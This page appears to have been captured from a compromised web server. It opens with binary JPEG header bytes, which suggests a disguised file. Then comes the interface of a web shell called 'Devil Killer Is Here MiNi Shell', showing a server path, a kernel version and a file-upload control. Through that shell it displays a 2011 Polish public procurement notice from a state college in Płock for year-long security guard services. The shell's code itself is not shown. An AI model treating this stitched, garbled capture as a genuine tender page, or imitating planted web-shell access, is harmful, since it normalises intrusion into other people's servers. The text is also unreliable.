JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111125/308925-N-2011.html

<p class="kh_header"><b>Płock: Świadczenie usługi całodobowej ochrony fizycznej osób i mienia na terenie obiektów Państwowej Wyższej Szkoły Zawodowej w Płocku w roku 2012</b><br>
<b>Numer ogłoszenia: 308925 - 2011; data zamieszczenia: 25.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku , Pl. Dąbrowskiego 2, 09-402 Płock, woj. mazowieckie, tel. 24 3665400, faks 24 3665421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwszplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi całodobowej ochrony fizycznej osób i mienia na terenie obiektów Państwowej Wyższej Szkoły Zawodowej w Płocku w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług całodobowej ochrony fizycznej osób i mienia na terenie obiektów Państwowej Wyższej Szkoły Zawodowej w Płocku w roku 2012.

          CPV: 79710000-4
              
Przez obiekty Państwowej Wyższej Szkoły Zawodowej w Płocku należy rozumieć jego mienie w postaci nieruchomości i budynków:
1)	Budynek przy ul. Kościuszki 20 (09-402 Płock) - Instytut Neofilologii.
2)	Budynek przy ul. Gałczyńskiego 28 (09-400 Płock) Studium Wychowania 
           Fizycznego i Sportu wraz z dwoma garażami.
3)	Budynek przy Plac Dąbrowskiego 2 (09-402 Płock) - Instytut Matematyki i 
           Informatyki, Akademickie Liceum Ogólnokształcące, Biblioteka 
           Uczelniana, Rektorat, administracja uczelni 
4)	Budynki na terenie Instytutu Nauk Ekonomicznych w Trzepowie Nowym: aula wraz z częścią dydaktyczną, dworek (siedziba dyrekcji instytutu), 
5)	Dom Studenta Nr 1 przy ul. Nowowiejskiego 6 (09-400 Płock).
      6)  Budynek mieszkalny przy ul. Zubrzyckiego 8 w Płocku
Do ww obiektów należy również teren zewnętrzny, wraz z terenami zielonymi, pieszymi ciągami komunikacyjnymi, wewnętrznymi drogami i parkingami.
                
ZAKRES OBOWIĄZKÓW WYKONAWCY NA POSTERUNKACH:

A. Posterunek nr l - (całodobowy) - portiernia w Instytucie Neofilologii w Płocku 
    ul. Kościuszki 20, wszystkie dni w tygodniu:

1.   Ochrona części budynku należącego do PWSZ w Płocku i terenu przyległego do części  
      budynku wraz z parkingiem ogrodzonym ogrodzeniem.
2. Obsługa szatni.
            3. Systematyczne  sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu 
     zabezpieczenia budynku PWSZ i terenu wokół budynku, w tym drzwi, okien i oświetlenia i 
     potwierdzanie tej kontroli w Książce Raportów.
             4.  Do wjazdu na teren parkingu uprawnieni są: pracownicy PWSZ w Płocku, pojazdy uprzywilejowane,   
                   samochody zaopatrzenia, poczta, pojazdy z oznakowaniem Przewóz osób niepełnosprawnych.
    5. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy oraz sprzętu audio-wideo  zdeponowanych w portierni oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy oraz sprzętu audio-wideo  potwierdzonych podpisem.
    6. Ścisła współpraca pomiędzy portierniami (posterunkami) za pomocą środków łączności.
   7. Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół. 
   8. Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
    9. Zapalanie i wygaszanie oświetlenia zewnętrznego.
  10. Prowadzenie Książki Raportów z przebiegu służby oraz  książki usterek.
  11. Przestrzeganie przez pracowników ochrony kulturalnego i grzecznego udzielania  informacji
  12. Otwieranie drzwi wejściowych o godz. 6 :00. i ich zamykanie o godz. 21:00.
 13. Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i porządku 
         zgodnie z obowiązującymi przepisami.
  14. Wygaszanie zbędnego oświetlenia w budynku.

B. Posterunek nr  2- (całodobowy) - portiernia w Studium Wychowania Fizycznego i 
    Sportu w Płocku ul. Gałczyńskiego 28, wszystkie dni w tygodniu:

1.   Ochrona części budynku należącego do PWSZ w Płocku i terenu przyległego do części budynku wraz   
     z garażami.
      2. Systematyczne sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu 
          zabezpieczenia budynku PWSZ i terenu wokół budynku, w tym drzwi, okien i oświetlenia potwierdzone 
           w Książce Raportów.
      3. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy  oraz sprzętu audio-wideo  zdeponowanych w portierni oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy  oraz sprzętu audio-wideo, potwierdzonych podpisem.
4. Ścisła współpraca pomiędzy pozostałymi  posterunkami za pomocą środków łączności,  w tym również 
    z portiernią w sąsiednim MSCDN     
     5. Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół.
6. Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
7. Zapalanie i wygaszanie oświetlenia zewnętrznego.
      8. Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
9. Otwieranie drzwi wejściowych o godz. 6 :00. i ich zamykanie o godz. 21:00.
      10. Przestrzeganie przez pracowników ochrony kulturalnego i grzecznego udzielania informacji.
       11.  Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i 
              porządku zgodnie z obowiązującymi przepisami.
12. Wygaszanie zbędnego oświetlenia w budynku.
13. Pilnowanie aby przed wjazdem do garaży nie parkowały samochody
C. Posterunek nr  3    (całodobowy)   portiernia od strony ul. Zacisze w budynku  administracyjno-dydaktycznym PWSZ w   Płocku Pl. Dąbrowskiego 2:

1.  Ochrona budynku należącego do PWSZ w Płocku i terenu przyległego do  całego obiektu.
       2.  Systematyczne  sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu 
           zabezpieczenia budynku PWSZ i terenu wokół budynku, w tym drzwi, okien i oświetlenia potwierdzone 
            w Książce Raportów.
     3.  Obsługa szatni  - od poniedziałku do piątku w godz. 15:00 - 22:00 w soboty i niedziele w czasie trwania  
           zajęć lekcyjnych.
      4. Ścisła współpraca pomiędzy pozostałymi posterunkami za pomocą środków łączności.
     5. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy oraz sprzętu audio-wideo  
          zdeponowanych w portierni oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy 
           oraz sprzętu audio-wideo,  potwierdzonych podpisem.
    6.  Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół.   
    7.   Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
8.    Zapalanie i wygaszanie oświetlenia zewnętrznego.
9.   Otwieranie bramy i drzwi wejściowych i ich zamykanie.
  10.   Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
  11.   Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i porządku 
         zgodnie z obowiązującymi przepisami.
12.	Wygaszanie zbędnego oświetlenia w budynku.
           13. Do wjazdu na teren parkingu uprawnieni są: pracownicy PWSZ w Płocku posiadający piloty do 
    otwierania i zamykania szlabanu wjazdowego oraz pozostali pracownicy, pojazdy uprzywilejowane, 
         samochody zaopatrzenia, poczta,

D. Posterunek  nr  4 ( w godzinach od 15:00 do 23:00  od poniedziałku do piątku i od 7:00 do 15:00 w soboty i niedziele)  -- portiernia-recepcja w budynku Rektoratu w Płocku 
    Pl. Dąbrowskiego 2, wszystkie dni w tygodniu:

1. Ochrona budynku należącego do PWSZ w Płocku i terenu przyległego do budynku wraz z parkingiem 
    na dziedzińcu budynku.
              2. Do wjazdu na teren parkingu uprawnieni są: pracownicy PWSZ w Płocku posiadający piloty do 
   otwierania i zamykania szlabanu wjazdowego oraz pozostali pracownicy, pojazdy uprzywilejowane, 
   samochody zaopatrzenia, poczta, 
      3.Systematyczne  sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu   
         zabezpieczenia budynku PWSZ i terenu wokół budynku, w tym drzwi, okien i oświetlenia potwierdzone 
          w Książce Raportów,
4. Obsługa szatni  - od poniedziałku do piątku w godz. 15:00 - 22:00 w soboty i niedziele w czasie trwania  
    zajęć lekcyjnych.
     5. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy oraz sprzętu audio-wideo  zdeponowanych w portierni oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy oraz sprzętu audio-wideo  potwierdzonych podpisem.
6. Ścisła współpraca pomiędzy pozostałymi posterunkami za pomocą środków łączności.
     7. Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół.
8. Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
9. Zapalanie i wygaszanie oświetlenia zewnętrznego.
     10. Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
     12. Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i 
           porządku zgodnie z obowiązującymi przepisami.
      13. Wygaszanie zbędnego oświetlenia w budynku.

E. Posterunek  nr  5 - dzienny w godzinach od 07:00 do 15:00 od poniedziałku do piątku. 
    Posterunek funkcjonuje tylko w okresie trwania roku szkolnego (oprócz okresu 
    wakacji, ferii zimowych i świątecznych) - portiernia-recepcja w budynku 
   Akademickiego Liceum Ogólnokształcącego w Płocku  Pl. Dąbrowskiego 2:

1. Ochrona budynku należącego do PWSZ w Płocku i terenu przyległego do budynku.
       2. Obsługa szatni.
      3. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy oraz sprzętu audio-wideo  zdeponowanych w portierni oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy oraz sprzętu audio-wideo  potwierdzonych podpisem.
4. Ścisła współpraca pomiędzy pozostałymi posterunkami za pomocą środków łączności.
     5. Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół.
6. Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
      7. Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
      8. Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i 
          porządku zgodnie z obowiązującymi przepisami.
      9. Wygaszanie zbędnego oświetlenia w budynku.
    10. Otwieranie drzwi wejściowych o godz.7:00 i zamykanie o godz. 15:00
     11. Posterunek może funkcjonować również po godzinie 15:00, Wykonawca powiadomiony zostanie o tym     fakcie przez Zamawiającego.  Wynagrodzenie za dodatkowe godziny, w tym zakresie, rozliczone zostanie w oparciu o koszt 1 roboczogodziny ochrony, podanej w formularzu cenowym przez Wykonawcę w   swojej ofercie.   

F. Posterunek nr 6- (całodobowy) - portiernia w budynku głównym (dworku) 
    Instytutu Nauk Ekonomicznych w Trzepowie Nowym, wszystkie dni w 
    tygodniu:
1.   Ochrona  budynków należących do PWSZ w Płocku, kotłowni olejowej i terenu przyległego do budynków wraz z parkingiem.
      2. Systematyczne  sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu 
           zabezpieczenia budynku PWSZ i terenu wokół budynku, w tym drzwi, okien i oświetlenia potwierdzone 
           w Książce Raportów.
              3. Do wjazdu na teren parkingu uprawnieni są: pracownicy PWSZ w Płocku, pojazdy uprzywilejowane, 
                 samochody zaopatrzenia, poczta,, pojazdy z oznakowaniem - Przewóz osób niepełnosprawnych.
     4. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy oraz sprzętu audio-wideo   zdeponowanych w portierni oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy oraz sprzętu audio-wideo  potwierdzonych podpisem.
      5. Obsługa szatni.    
    6. Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół.
    7. Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
    8. Zapalanie i wygaszanie oświetlenia zewnętrznego.
     9. Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
  10. Otwieranie  drzwi wejściowych i bramy  o godz. 6 :00 i ich zamykanie o godz. 21:00.
  11. Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i porządku 
         zgodnie z obowiązującymi przepisami.
  12. Wygaszanie zbędnego oświetlenia w budynku.

G. Posterunek nr 7- (całodobowy) - portiernia w budynku auli Instytutu Nauk 
     Ekonomicznych w Trzepowie Nowym, wszystkie dni w tygodniu:

1.   Ochrona  budynków należących do PWSZ w Płocku, kotłowni olejowej i terenu przyległego do 
      budynków wraz z parkingiem.
       2. Systematyczne  sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu 
           zabezpieczenia budynku PWSZ i terenu wokół budynku, w tym drzwi, okien i oświetlenia potwierdzone 
           w Książce Raportów.
              3. Do wjazdu na teren parkingu uprawnieni są: pracownicy PWSZ w Płocku, pojazdy uprzywilejowane, 
                 samochody zaopatrzenia, poczta,, pojazdy z oznakowaniem - Przewóz osób niepełnosprawnych.
     4. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy oraz sprzętu audio-wideo  zdeponowanych w portierni oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy oraz sprzętu audio-wideo  potwierdzonych podpisem.
      5. Obsługa szatni.    
    6. Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół.
    7. Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
    8. Zapalanie i wygaszanie oświetlenia zewnętrznego.
     9. Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
   10. Otwieranie drzwi wejściowych i bramy o godz. 6:00 i ich zamykanie o godz. 21:00.
   11. Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i porządku 
         zgodnie z obowiązującymi przepisami.
   12. Obsługa tablicy synoptycznej, systemu p. poż. i  alarmu.
  13.  Wygaszanie zbędnego oświetlenia w budynku.

H. Posterunek nr 8- nocny obchodowy w godz. od 20:00 do 06:00)  
   Wszystkie dni w tygodniu   teren zewnętrzny - dozór ciągły
   Instytutu Nauk Ekonomicznych w Nowym Trzepowie:

1.   Ochrona  budynków należących do PWSZ w Płocku, kotłowni olejowej i terenu przyległego do 
      budynków wraz z parkingiem.
       2.  Sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu  zabezpieczenia budynków PWSZ    i terenu wokół budynków, w tym drzwi, okien i oświetlenia ,  potwierdzone    w  Książce Raportów.
              3. Do wjazdu na teren parkingu uprawnieni są: pracownicy PWSZ w Płocku, pojazdy uprzywilejowane, 
                 samochody zaopatrzenia, poczta,, pojazdy z oznakowaniem - Przewóz osób niepełnosprawnych
     4. Zapalanie i wygaszanie oświetlenia zewnętrznego.
      5. Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
      6. Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i porządku 
         zgodnie z obowiązującymi przepisami.


I. Posterunek nr 9 - (całodobowy) - portiernia/recepcja w budynku Domu 
    Studenta Nr 1 w Płocku przy ul. Nowowiejskiego 6, wszystkie dni w tygodniu:

1. Ochrona  budynku Domu Studenta Nr 1 i terenu przyległego do budynku wraz z parkingiem.
       2. Systematyczne  sprawdzanie i kontrola w godzinach wieczorowo - nocnych stanu 
           zabezpieczenia budynku PWSZ i terenu wokół budynku, w tym drzwi, okien i oświetlenia potwierdzone 
           w Książce Raportów.
        3.  Wydawanie i przyjmowanie kluczy do pokoi.
        4. Doraźne kwaterowanie gości hotelowych po południu i wieczorem.
        5. Legitymowanie wszystkich osób wchodzących na teren Domu Studenta, zatrzymywanie dowodów 
          tożsamości . Kontrola ruchu osobowego (kontrola wejść i wyjść).    
      6. Sprawdzanie pomieszczeń użyteczności ogólnej bezpośrednio po opuszczeniu ich przez studentów i   
     pozostałe osoby z nich korzystające (stołówka, świetlica).
7. Dozorowanie instalacji wodnej i kanalizacyjnej w porze nocnej.
8. Prowadzenie zeszytu usterek zgłaszanych przez studentów i pracowników - zgłaszanie ich Kierownikowi  
    Domu Studenta.
9. Do wjazdu na teren parkingu uprawnieni są: pracownicy PWSZ w Płocku posiadający piloty do 
   otwierania i zamykania bramy wjazdowej oraz pozostali pracownicy, pojazdy uprzywilejowane, 
   samochody zaopatrzenia, poczta.
   10. Przyjmowanie, wydawanie i prawidłowe zabezpieczenie kluczy zdeponowanych w recepcji   
          oraz prowadzenie książki rejestru wydawanych i zdawanych kluczy potwierdzonych podpisem.
     11. Otwieranie drzwi w godzinach nocnych mieszkańcom Domu Studenta . 
   12. Dbanie o estetyczny wygląd w pomieszczeniu portierni i wokół.
   13. Przestrzeganie zakazu przebywania w portierni osobom nieupoważnionym.
   14. Zapalanie i wygaszanie oświetlenia zewnętrznego.
    15. Prowadzenie Książki Raportów z przebiegu służby oraz książki usterek.
    16. Otwieranie drzwi wejściowych i bramy o godz. 06:00 i ich zamykanie o godz. 22:00.
    17. Dokonywanie kontroli osób i podjęcie ewentualnej interwencji w przypadku zakłócania ładu i porządku 
         zgodnie z obowiązującymi przepisami.
   18. Wygaszanie zbędnego oświetlenia w budynku.
    19. Obsługa tablicy synoptycznej i systemu p. poż. .

J.  Posterunek  nr  10 całodobowy  -  bud. mieszkalny,  Zubrzyckiego 8 w Płocku /wszystkie  dni w tygodniu/ - monitoring   elektroniczny

1.  Całodobowa ochrona budynku mieszkalnego przy ul. Zubrzyckiego 8  w  Płocku 
2.  Całodobowe odbieranie przez Alarmowe Centrum Odbiorcze sygnałów alarmowych i technicznych 
     generowanych przez lokalny system alarmowy  z wykorzystaniem toru GSM  Zleceniodawcy.
3.  Natychmiastowe wysyłanie grupy interwencyjnej w przypadku otrzymania sygnału alarmowego celem
     dokonania skutecznej interwencji. 
4.  Działanie grupy interwencyjnej polegać będzie na :
- przybyciu do chronionego obiektu od otrzymania sygnału alarmowego w 10 minut w godz. 6:00 -    
       18:00 i w 8 minut w godz.   18:00 - 6:00
     - podjęcie działań mających na celu zatrzymanie sprawców, udzielenia pomocy poszkodowanym i
        zabezpieczenia obiektu  zgodnie z uprawnieniami agencji ochrony
     -  powiadomienie Policji o zdarzeniu w przypadku zaistnienia uzasadnionego podejrzenia o popełnieniu
        przestępstwa w chronionym obiekcie a także  powiadomienie osób  wskazanych przez Zleceniodawcę
       wykaz osób  dostarczy Zleceniodawca
5.  Konserwacja w/w systemu alarmowego.

UWAGA (dotyczy wszystkich posterunków):

1. W przypadku zagrożenia nadzwyczajnego np.: pożar, dywersja, akt terrorystyczny, pracownicy ochrony natychmiast powiadomią o tym odpowiednie służby i podejmą działalność zabezpieczającą budynki PWSZ w Płocku i osoby przebywające na ich terenie oraz utrzymają porządek w prowadzonej akcji ratowniczej i ewakuacji ludności.
2. Pracownicy ochrony powiadomią natychmiast organy ścigania i inne uprawnione do tego służby w przypadku sytuacji, w których doszło do popełnienia przestępstwa lub wykroczenia. O fakcie tym poinformują jednocześnie Zamawiającego.
3. Pracownicy ochrony zobowiązani są przestrzegać przepisy bhp, p. poż. i sanitarne.
4. Obowiązkiem pracowników ochrony jest:
1)	kontrola osób zakłócających ład i porządek lub wskazanych przez personel PWSZ zgodnie z obowiązującymi przepisami,
2)	zapobieganie czynom chuligańskim i innym czynom sprzecznym  z obowiązującym porządkiem prawnym skierowanym przeciwko pracownikom, studentom Zamawiającego oraz interesom osób przebywającym na terenie chronionych obiektów,
3)	zgłaszanie niezwłocznie Zamawiającemu wszelkich nieprawidłowości i punktów krytycznych w  prawidłowym funkcjonowaniu systemu ochrony na terenie jego obiektów.  
 5. Pracownicy ochrony powinni przestrzegać przepisy o ochronie danych osobowych.
 6. Pracownik Wykonawcy powinien nosić ubiór służbowy z oznaczeniem OCHRONA (z nazwą/ firmą Wykonawcy) oraz dbać o estetyczny wygląd i kulturalne zachowanie.
 7. Pracownik ochrony może stosować środki przymusu bezpośredniego wobec osób
    uniemożliwiających wykonanie przez niego zadań zgodnie z obowiązującymi przepisami, określonych w
     ustawie z dnia 22.08.1997 r. o ochronie osób i mienia.
 8.   Wykonawca zapewni przyjazd grupy interwencyjnej w ciągu max 15 minut od chwili zgłoszenia.
       nie dot.  posterunku nr 10
9.	Zamówienie będzie realizowane ściśle wg przepisów ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i  mienia (Dz. U.  Nr 114, poz. 740 z późn.  zm.) i aktów  wykonawczych do niej. 
10.	Pracownicy ochrony zobowiązani są do utrzymania stałej łączności z centrum dowodzenia   Wykonawcy oraz z grupą interwencyjną. Ponadto do ich zadań należy obsługa systemu kamer przemysłowych wraz z rejestracją obrazu (rejestrator obrazu na posterunku).
11. Zamawiający przedstawi ze swojej strony wykaz osób (wraz z numerami telefonów) 
      upoważnionych do kontaktowania się z Wykonawcą podczas realizacji przedmiotowej 
      usługi. Osoby te powinny być informowane również o wszystkich zaistniałych awariach i 
      usterkach w obiektach.
12. Wszystkie zaistniałe awarie i usterki oraz inne zdarzenia powinny być niezwłocznie 
      zgłaszane Zamawiającemu i jednocześnie odnotowane w książce usterek.
13. Zamawiający wymaga, aby Wykonawca, którego oferta zostanie uznana za    
     najkorzystniejszą, na 3 dni przed planowanym terminem realizacji usługi, skontaktował się 
z kierownictwem Działu Administracyjnego PWSZ w Płocku, w celu ustalenia 
spraw o charakterze organizacyjnym.
14. Na terenie wszystkich obiektów uczelni obowiązuje bezwzględny zakaz palenia tytoniu.   Wykonawca zobowiązany jest do przestrzegania i jednocześnie kontrolowania tego zakazu. Stwierdzone naruszenia odnotowane powinny być w książce raportów i przekazane następnie Zamawiającemu.
15. Wykonawca we własnym zakresie i na własny koszt zaopatrzy wszystkie posterunki w książki wydawania kluczy oraz sprzętu audio-wideo .
16. W przypadku, gdy na danym posterunku przestanie działać urządzenie - pilot do otwierania bramy lub szlabanu, Wykonawca we własnym zakresie, na własny koszt oraz użytek zw. z wykonywaniem przedmiotu zamówienia, zaopatrzy posterunek w nowego pilota. Kwestię zaprogramowania nowego pilota Wykonawca niezwłocznie powierzy Zamawiającemu.
17. Wykonawca na własny koszt i we własnym zakresie wyposaży szatnie w numerki a także  
      będzie na bieżąco uzupełniał zaginione.
18. Ze względu na sąsiedztwo szatni funkcjonujące na poszczególnych posterunkach zabrania się przygotowywania gorących posiłków. Zamawiający zabrania również korzystania z odbiorników telewizyjnych w trakcie wykonywania usługi.
Zamawiający zastrzega sobie, w czasie obowiązywania umowy, zwiększenie ilości posterunków, w przypadku oddania do użytku nowych budynków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>usługa w zakresie ochrony, do 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 8 000,00 (osiem tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
